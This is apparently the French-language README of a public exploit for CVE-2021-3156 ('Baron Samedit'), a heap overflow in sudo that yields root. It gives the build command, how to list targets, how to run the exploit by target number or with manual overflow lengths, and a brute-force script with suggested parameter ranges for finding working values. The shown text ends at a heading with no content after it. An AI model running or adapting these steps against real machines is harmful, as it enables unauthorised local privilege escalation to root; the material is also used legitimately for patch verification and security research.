
Exploit de débordement de tampon basé sur le tas pour CVE-2021-3156 (Baron Samedit) dans sudo, offrant une élévation de privilèges vers root avec plusieurs configurations cibles et une recherche expérimentale de cible par force brute.
Ceci est un exploit pour la vulnérabilité sudo CVE-2021-3156 (surnommée Baron Samedit par Qualys).
compilation :
$ make
lister les cibles :
$ ./sudo-hax-me-a-sandwich
exécution :
$ ./sudo-hax-me-a-sandwich <target_number>
mode manuel :
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Assurez-vous d'avoir GNU parallel installé.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
quelques valeurs par défaut à essayer :
$ ./brute.sh 90 120 50 70 150 300
Cela consommera tous les cœurs disponibles. Ne tentez pas de Netflix & brute.
Envoyez des PR (sensées), je pourrais fusionner.
Quelques idées :